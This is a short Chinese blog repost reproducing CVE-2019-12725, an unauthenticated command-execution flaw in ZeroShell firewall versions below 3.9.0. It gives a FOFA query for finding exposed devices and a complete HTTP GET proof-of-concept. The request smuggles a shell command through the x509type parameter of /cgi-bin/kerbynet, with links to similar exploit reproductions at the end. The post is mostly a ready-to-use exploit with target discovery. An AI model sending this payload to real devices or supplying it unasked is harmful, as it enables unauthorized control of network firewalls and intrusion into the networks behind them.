某防火墙命令执行复现

Posted 蓝银花

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了某防火墙命令执行复现相关的知识,希望对你有一定的参考价值。

漏洞介绍:

ZoreShell防火墙版本小于3.9.0存在命令执行(CVE-2019-12725),Zeroshell是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能,可以用来安装到服务器上为内网提供网络服务。

 

FOFA语法:

app="Zeroshell-防火墙"


 

复现poc

1 GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 HTTP/1.1
2 Host: xxxxxxxx
3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Connection: close
7 Upgrade-Insecure-Requests: 1
8 Cache-Control: max-age=0

 

数据包修改

 

以上是关于某防火墙命令执行复现的主要内容,如果未能解决你的问题,请参考以下文章

锐捷 Smartweb管理系统 命令执行漏洞

F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)

Tomcat CGIServlet enableCmdLineArguments远程代码执行_CVE-2019-0232漏洞复现

路由器漏洞挖掘之 DIR-850/645 命令执行漏洞复现

Spring Framework 远程命令执行漏洞复现(CVE-2022-22965)

华为路由器远程命令执行漏洞复现(CVE-2017-17215)